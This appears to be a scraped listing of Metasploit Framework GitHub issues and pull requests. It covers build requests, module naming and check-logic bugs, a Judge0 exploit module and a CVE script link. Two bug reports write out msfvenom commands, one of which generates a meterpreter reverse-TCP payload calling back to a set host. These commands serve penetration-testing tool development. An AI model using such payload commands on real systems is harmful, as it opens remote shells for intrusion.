metasploit-framework
metasploit-framework copied to clipboard
rapid7
Metasploit Framework
Add a codeowners file Edit: Looks like the downside is not being able to ignore the automatic request for reviews: https://github.com/orgs/community/discussions/35673 ## Verification - Verify the file - https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/customizing-your-repository/about-code-owners
## Steps to reproduce: msfvenom -p windows/exec cmd="без разницы" -f python I'm using latest Kali version on vmware workstation pro 17. Same issue with Windows metasploit version. Metasploit version: 6.3.55-dev...
## Summary Future versions of Metasploit framework may remove the msfdb remote webservice Metasploit has support for running with a local database, or from a remote web service which can...
https://github.com/kali-mx/CVE-2023-38408/blob/main/CVE-2023-38408.sh Credits to Max Ahartz (author)
## Summary Support Universal build for macOS (x86_64 and arm64). If Universal cannot be done, then provide arm64 installer pkg file in addition to x86_64. I did a complete dev...
## Steps to reproduce How'd you do it? 1. I generated a payload using the command `msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.165 LPORT=3000 -f elf --platform linux --arch aarch64 -o /home/xyzzklkuser/test SessionExpirationTimeout=30...
Hi I have developed a Metasploit auxiliary module that assists penetration testers in locating backup files across a list of subdomains. You can find it here: https://github.com/paragbagul111/metasploit-backup-scanner Please take a...
`CheckCode::Vulnerable` is used in instances where a host is proven to be exploitable. However, the current `check` logic in [cve_2021_4034_pwnkit_lpe_pkexec](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb) can only verify whether the system appears vulnerable, and should...
https://github.com/rapid7/metasploit-framework/issues/19149 ## Vulnerable Application Judge0 does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code...
The [post/linux/gather/enum_psk](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_psk.rb) module file name and module name do not match and are misleading. This module has a generic name (`enum_psk`). A more appropriate name would be `enum_wifi_psk`; although it...